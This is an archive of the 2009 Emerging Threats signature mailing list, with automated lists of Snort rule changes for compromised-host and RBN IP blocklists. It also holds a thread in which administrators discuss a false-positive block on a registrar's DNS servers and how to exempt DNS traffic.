2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

-> Added to emerging-sid-msg.map.txt (57):
2002801 || ET POLICY Google Desktop User-Agent Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html
2002838 || ET POLICY Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html
2002849 || ET POLICY Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509
2009748 || ET WEB Possible Wordpress Administrative Password Reset Vulnerability || url,www.securitytracker.com/alerts/2009/Aug/1022707.html
2009749 || ET
SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan || url,www.checkupdown.com/status/E403.html 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET COMPROMISED Known Compromised or Hostile Host 
Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) 
|| url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-web.rules (1): #by Kevin Ross and Bojan Zdrnja [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (5): 2002801 || ET WEB_SPECIFIC Google Desktop User-Agent Detected || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html 2002838 || ET WEB_SPECIFIC Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2404025 || ET DROP Known Bot C&C Server Traffic (group 26) || url,www.shadowserver.org 2405025 || ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE || url,www.shadowserver.org -> Removed from emerging-sid-msg.map.txt (5): 2002801 || ET WEB_SPECIFIC Google Desktop User-Agent Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html 2002838 || ET WEB_SPECIFIC Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2404025 || ET DROP Known Bot C&C Server Traffic (group 26) || url,www.shadowserver.org 2405025 || ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE || url,www.shadowserver.org -> Removed from emerging-web_sql_injection.rules (3): # Submitted by Michael Holstein, 2006-02-13. Reference from scheidell # Submitted 2006-02-28 by Mark Warren. 
For Google appliances that "should" only spider internal web sites (but sometimes go wild and spider the Internet)
#by Blake Hartstein of Demarc

From scheidell at secnap.net Wed Aug 12 11:01:48 2009
From: scheidell at secnap.net (Michael Scheidell)
Date: Wed, 12 Aug 2009 11:01:48 -0400
Subject: [Emerging-Sigs] FP on on sid 2510255
Message-ID: <4A82D95C.1070005@secnap.net>

so, are you saying that dns1.name-services.com has been hacked into?

zgrep 98.124.192 /var/log/snort.log.0.gz
Aug 11 20:12:47 scanner snort[65132]: [1:2510255:1615] ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) [Classification: Misc Attack] [Priority: 2]: {UDP} 98.124.192.1:53 -> 10.70.1.3:25892

or is this a FP?

name-services.com is used by a LOT OF PEOPLE, and blocking their traffic is bad!!!

Jon:

please disable the ET COMPROMISED rule sets on all IDS's and the BLOCKING rule set on all IPS's.

--
Michael Scheidell, CTO
Phone: 561-999-5000, x 1259
> *| *SECNAP Network Security Corporation

* Certified SNORT Integrator
* 2008-9 Hot Company Award Winner, World Executive Alliance
* Five-Star Partner Program 2009, VARBusiness
* Best Anti-Spam Product 2008, Network Products Guide
* King of Spam Filters, SC Magazine 2008

_________________________________________________________________________
This email has been scanned and certified safe by SpammerTrap(r).
For Information please see http://www.spammertrap.com
_________________________________________________________________________
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090812/e937fba5/attachment-0001.html

From evilghost at packetmail.net Wed Aug 12 11:07:00 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Wed, 12 Aug 2009 10:07:00 -0500
Subject: [Emerging-Sigs] FP on on sid 2510255
In-Reply-To: <4A82D95C.1070005@secnap.net>
References: <4A82D95C.1070005@secnap.net>
Message-ID: <4A82DA94.7030303@packetmail.net>

We have these issues, with Enom, GoDaddy, and more. Our solution was to avoid blocking on UDP 53 via the use of sed prior to rule deployment. I agree, blocking major name-servers is not good. We find this across a few of the host/IP-based rules.

#Do not block on DNS due to false positives and resolution failure.
/bin/sed -i 's/alert udp\(.*\) any -> \(.*\)$/alert udp\1 \!53 -> \2/g' /opt/snortrules/rules/rules/emerging-rbn.rules
/bin/sed -i 's/alert udp\(.*\) any -> \(.*\)$/alert udp\1 \!53 -> \2/g' /opt/snortrules/rules/rules/emerging-compromised.rules
/bin/sed -i 's/alert ip\(.*\) any -> \(.*\)$/alert ip\1 \!53 -> \2/g' /opt/snortrules/rules/rules/emerging-botcc.rules

-evilghost

Michael Scheidell wrote:
> so, are you saying that dns1.name-services.com has been hacked into?
>
> zgrep 98.124.192 /var/log/snort.log.0.gz
> Aug 11 20:12:47 scanner snort[65132]: [1:2510255:1615] ET COMPROMISED
> Known Compromised or Hostile Host Traffic UDP - BLOCKING (128)
> [Classification: Misc Attack] [Priority: 2]: {UDP}
> 98.124.192.1:53 -> 10.70.1.3:25892
>
> or is this a FP?
>
> name-services.com is used by a LOT OF PEOPLE, and blocking their
> traffic is bad!!!
>
> Jon:
>
> please disable the ET COMPROMISED rule sets on all IDS's and the
> BLOCKING rule set on all IPS's.
>
>
>
> --
> Michael Scheidell, CTO
> Phone: 561-999-5000, x 1259
> > *| *SECNAP Network Security Corporation
>
> * Certified SNORT Integrator
> * 2008-9 Hot Company Award Winner, World Executive Alliance
> * Five-Star Partner Program 2009, VARBusiness
> * Best Anti-Spam Product 2008, Network Products Guide
> * King of Spam Filters, SC Magazine 2008
>
>
> ------------------------------------------------------------------------
>
> This email has been scanned and certified safe by SpammerTrap(r).
> For Information please see www.spammertrap.com
>
>
> ------------------------------------------------------------------------
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>

From scheidell at secnap.net Wed Aug 12 12:44:37 2009
From: scheidell at secnap.net (Michael Scheidell)
Date: Wed, 12 Aug 2009 12:44:37 -0400
Subject: [Emerging-Sigs] FP on on sid 2510255
In-Reply-To: <4A82D95C.1070005@secnap.net>
References: <4A82D95C.1070005@secnap.net>
Message-ID: <4A82F175.4090906@secnap.net>

these ip's also. looks like it blocked all of their dns servers.

98.124.193.1/32 0
98.124.196.1/32 0
98.124.197.1/32 0

Michael Scheidell wrote:
> so, are you saying that dns1.name-services.com has been hacked into?
>
> zgrep 98.124.192 /var/log/snort.log.0.gz
> Aug 11 20:12:47 scanner snort[65132]: [1:2510255:1615] ET COMPROMISED
> Known Compromised or Hostile Host Traffic UDP - BLOCKING (128)
> [Classification: Misc Attack] [Priority: 2]: {UDP}
> 98.124.192.1:53 -> 10.70.1.3:25892
>
> or is this a FP?
>
> name-services.com is used by a LOT OF PEOPLE, and blocking their
> traffic is bad!!!
>
> Jon:
>
> please disable the ET COMPROMISED rule sets on all IDS's and the
> BLOCKING rule set on all IPS's.
>
>
>
> --
> Michael Scheidell, CTO
> Phone: 561-999-5000, x 1259
> > *| *SECNAP Network Security Corporation
>
> * Certified SNORT Integrator
> * 2008-9 Hot Company Award Winner, World Executive Alliance
> * Five-Star Partner Program 2009, VARBusiness
> * Best Anti-Spam Product 2008, Network Products Guide
> * King of Spam Filters, SC Magazine 2008
>

--
Michael Scheidell, CTO
Phone: 561-999-5000, x 1259
> *| *SECNAP Network Security Corporation

* Certified SNORT Integrator
* 2008-9 Hot Company Award Winner, World Executive Alliance
* Five-Star Partner Program 2009, VARBusiness
* Best Anti-Spam Product 2008, Network Products Guide
* King of Spam Filters, SC Magazine 2008

_________________________________________________________________________
This email has been scanned and certified safe by SpammerTrap(r).
For Information please see http://www.spammertrap.com
_________________________________________________________________________
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090812/a73863c9/attachment.html

From jonkman at jonkmans.com Wed Aug 12 15:02:33 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 12 Aug 2009 15:02:33 -0400
Subject: [Emerging-Sigs] FP on on sid 2510255
In-Reply-To: <4A82DA94.7030303@packetmail.net>
References: <4A82D95C.1070005@secnap.net> <4A82DA94.7030303@packetmail.net>
Message-ID: <4A8311C9.4000309@jonkmans.com>

I've manually removed them. They were reported through the waledac feed we get. I'd assume they're not compromised but unwittingly hosting bad accounts.

Will get it reported asap!

Matt

evilghost at packetmail.net wrote:
> We have these issues, with Enom, GoDaddy, and more. Our solution was to
> avoid blocking on UDP 53 via the use of sed prior to rule deployment. I
> agree, blocking major name-servers is not good. We find this across a
> few of the host/IP-based rules.
>
> #Do not block on DNS due to false positives and resolution failure.
> /bin/sed -i 's/alert udp\(.*\) any -> \(.*\)$/alert udp\1 \!53 -> \2/g'
> /opt/snortrules/rules/rules/emerging-rbn.rules
> /bin/sed -i 's/alert udp\(.*\) any -> \(.*\)$/alert udp\1 \!53 -> \2/g'
> /opt/snortrules/rules/rules/emerging-compromised.rules
> /bin/sed -i 's/alert ip\(.*\) any -> \(.*\)$/alert ip\1 \!53 -> \2/g'
> /opt/snortrules/rules/rules/emerging-botcc.rules
>
> -evilghost
>
>
> Michael Scheidell wrote:
>> so, are you saying that dns1.name-services.com has been hacked into?
>>
>> zgrep 98.124.192 /var/log/snort.log.0.gz
>> Aug 11 20:12:47 scanner snort[65132]: [1:2510255:1615] ET COMPROMISED
>> Known Compromised or Hostile Host Traffic UDP - BLOCKING (128)
>> [Classification: Misc Attack] [Priority: 2]: {UDP}
>> 98.124.192.1:53 -> 10.70.1.3:25892
>>
>> or is this a FP?
>>
>> name-services.com is used by a LOT OF PEOPLE, and blocking their
>> traffic is bad!!!
>>
>> Jon:
>>
>> please disable the ET COMPROMISED rule sets on all IDS's and the
>> BLOCKING rule set on all IPS's.
>>
>>
>>
>> --
>> Michael Scheidell, CTO
>> Phone: 561-999-5000, x 1259
>>> *| *SECNAP Network Security Corporation
>> * Certified SNORT Integrator
>> * 2008-9 Hot Company Award Winner, World Executive Alliance
>> * Five-Star Partner Program 2009, VARBusiness
>> * Best Anti-Spam Product 2008, Network Products Guide
>> * King of Spam Filters, SC Magazine 2008
>>
>>
>> ------------------------------------------------------------------------
>>
>> This email has been scanned and certified safe by SpammerTrap(r).
>> For Information please see www.spammertrap.com
>>
>>
>> ------------------------------------------------------------------------
>>
>> ------------------------------------------------------------------------
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From emerging at emergingthreats.net Wed Aug 12 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Wed, 12 Aug 2009 16:00:12 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090812200012.3EC0C4504A@goliath.jonkmans.com>

[***] Results from Oinkmaster started Wed Aug 12 16:00:12 2009 [***]

[+++] Added rules: [+++]

2003634 - ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan (emerging-scan.rules)
2406730 - ET RBN Known Russian Business Network IP TCP (366) (emerging-rbn.rules)
2406731 - ET RBN Known Russian Business Network IP UDP (366) (emerging-rbn.rules)
2406732 - ET RBN Known Russian Business Network IP TCP (367) (emerging-rbn.rules)
2406733 - ET RBN Known Russian Business Network IP UDP (367) (emerging-rbn.rules)
2406734 - ET RBN Known Russian Business Network IP TCP (368) (emerging-rbn.rules)
2406735 - ET RBN Known Russian Business Network IP UDP (368) (emerging-rbn.rules)
2406736 - ET RBN Known Russian Business Network IP TCP (369) (emerging-rbn.rules)
2406737 - ET RBN Known Russian Business Network IP UDP (369) (emerging-rbn.rules) 2406738 - ET RBN Known Russian Business Network IP TCP (370) (emerging-rbn.rules) 2406739 - ET RBN Known Russian Business Network IP UDP (370) (emerging-rbn.rules) 2406740 - ET RBN Known Russian Business Network IP TCP (371) (emerging-rbn.rules) 2406741 - ET RBN Known Russian Business Network IP UDP (371) (emerging-rbn.rules) 2406742 - ET RBN Known Russian Business Network IP TCP (372) (emerging-rbn.rules) 2406743 - ET RBN Known Russian Business Network IP UDP (372) (emerging-rbn.rules) 2406744 - ET RBN Known Russian Business Network IP TCP (373) (emerging-rbn.rules) 2406745 - ET RBN Known Russian Business Network IP UDP (373) (emerging-rbn.rules) 2406746 - ET RBN Known Russian Business Network IP TCP (374) (emerging-rbn.rules) 2406747 - ET RBN Known Russian Business Network IP UDP (374) (emerging-rbn.rules) 2406748 - ET RBN Known Russian Business Network IP TCP (375) (emerging-rbn.rules) 2406749 - ET RBN Known Russian Business Network IP UDP (375) (emerging-rbn.rules) 2406750 - ET RBN Known Russian Business Network IP TCP (376) (emerging-rbn.rules) 2406751 - ET RBN Known Russian Business Network IP UDP (376) (emerging-rbn.rules) 2406752 - ET RBN Known Russian Business Network IP TCP (377) (emerging-rbn.rules) 2406753 - ET RBN Known Russian Business Network IP UDP (377) (emerging-rbn.rules) 2406754 - ET RBN Known Russian Business Network IP TCP (378) (emerging-rbn.rules) 2406755 - ET RBN Known Russian Business Network IP UDP (378) (emerging-rbn.rules) 2406756 - ET RBN Known Russian Business Network IP TCP (379) (emerging-rbn.rules) 2406757 - ET RBN Known Russian Business Network IP UDP (379) (emerging-rbn.rules) 2406758 - ET RBN Known Russian Business Network IP TCP (380) (emerging-rbn.rules) 2406759 - ET RBN Known Russian Business Network IP UDP (380) (emerging-rbn.rules) 2406760 - ET RBN Known Russian Business Network IP TCP (381) (emerging-rbn.rules) 2406761 - ET RBN Known Russian 
Business Network IP UDP (381) (emerging-rbn.rules) 2406762 - ET RBN Known Russian Business Network IP TCP (382) (emerging-rbn.rules) 2406763 - ET RBN Known Russian Business Network IP UDP (382) (emerging-rbn.rules) 2406764 - ET RBN Known Russian Business Network IP TCP (383) (emerging-rbn.rules) 2406765 - ET RBN Known Russian Business Network IP UDP (383) (emerging-rbn.rules) 2406766 - ET RBN Known Russian Business Network IP TCP (384) (emerging-rbn.rules) 2406767 - ET RBN Known Russian Business Network IP UDP (384) (emerging-rbn.rules) 2406768 - ET RBN Known Russian Business Network IP TCP (385) (emerging-rbn.rules) 2406769 - ET RBN Known Russian Business Network IP UDP (385) (emerging-rbn.rules) 2406770 - ET RBN Known Russian Business Network IP TCP (386) (emerging-rbn.rules) 2406771 - ET RBN Known Russian Business Network IP UDP (386) (emerging-rbn.rules) 2406772 - ET RBN Known Russian Business Network IP TCP (387) (emerging-rbn.rules) 2406773 - ET RBN Known Russian Business Network IP UDP (387) (emerging-rbn.rules) 2406774 - ET RBN Known Russian Business Network IP TCP (388) (emerging-rbn.rules) 2406775 - ET RBN Known Russian Business Network IP UDP (388) (emerging-rbn.rules) 2407730 - ET RBN Known Russian Business Network IP TCP - BLOCKING (366) (emerging-rbn-BLOCK.rules) 2407731 - ET RBN Known Russian Business Network IP UDP - BLOCKING (366) (emerging-rbn-BLOCK.rules) 2407732 - ET RBN Known Russian Business Network IP TCP - BLOCKING (367) (emerging-rbn-BLOCK.rules) 2407733 - ET RBN Known Russian Business Network IP UDP - BLOCKING (367) (emerging-rbn-BLOCK.rules) 2407734 - ET RBN Known Russian Business Network IP TCP - BLOCKING (368) (emerging-rbn-BLOCK.rules) 2407735 - ET RBN Known Russian Business Network IP UDP - BLOCKING (368) (emerging-rbn-BLOCK.rules) 2407736 - ET RBN Known Russian Business Network IP TCP - BLOCKING (369) (emerging-rbn-BLOCK.rules) 2407737 - ET RBN Known Russian Business Network IP UDP - BLOCKING (369) (emerging-rbn-BLOCK.rules) 2407738 
- ET RBN Known Russian Business Network IP TCP - BLOCKING (370) (emerging-rbn-BLOCK.rules) 2407739 - ET RBN Known Russian Business Network IP UDP - BLOCKING (370) (emerging-rbn-BLOCK.rules) 2407740 - ET RBN Known Russian Business Network IP TCP - BLOCKING (371) (emerging-rbn-BLOCK.rules) 2407741 - ET RBN Known Russian Business Network IP UDP - BLOCKING (371) (emerging-rbn-BLOCK.rules) 2407742 - ET RBN Known Russian Business Network IP TCP - BLOCKING (372) (emerging-rbn-BLOCK.rules) 2407743 - ET RBN Known Russian Business Network IP UDP - BLOCKING (372) (emerging-rbn-BLOCK.rules) 2407744 - ET RBN Known Russian Business Network IP TCP - BLOCKING (373) (emerging-rbn-BLOCK.rules) 2407745 - ET RBN Known Russian Business Network IP UDP - BLOCKING (373) (emerging-rbn-BLOCK.rules) 2407746 - ET RBN Known Russian Business Network IP TCP - BLOCKING (374) (emerging-rbn-BLOCK.rules) 2407747 - ET RBN Known Russian Business Network IP UDP - BLOCKING (374) (emerging-rbn-BLOCK.rules) 2407748 - ET RBN Known Russian Business Network IP TCP - BLOCKING (375) (emerging-rbn-BLOCK.rules) 2407749 - ET RBN Known Russian Business Network IP UDP - BLOCKING (375) (emerging-rbn-BLOCK.rules) 2407750 - ET RBN Known Russian Business Network IP TCP - BLOCKING (376) (emerging-rbn-BLOCK.rules) 2407751 - ET RBN Known Russian Business Network IP UDP - BLOCKING (376) (emerging-rbn-BLOCK.rules) 2407752 - ET RBN Known Russian Business Network IP TCP - BLOCKING (377) (emerging-rbn-BLOCK.rules) 2407753 - ET RBN Known Russian Business Network IP UDP - BLOCKING (377) (emerging-rbn-BLOCK.rules) 2407754 - ET RBN Known Russian Business Network IP TCP - BLOCKING (378) (emerging-rbn-BLOCK.rules) 2407755 - ET RBN Known Russian Business Network IP UDP - BLOCKING (378) (emerging-rbn-BLOCK.rules) 2407756 - ET RBN Known Russian Business Network IP TCP - BLOCKING (379) (emerging-rbn-BLOCK.rules) 2407757 - ET RBN Known Russian Business Network IP UDP - BLOCKING (379) (emerging-rbn-BLOCK.rules) 2407758 - ET RBN Known 
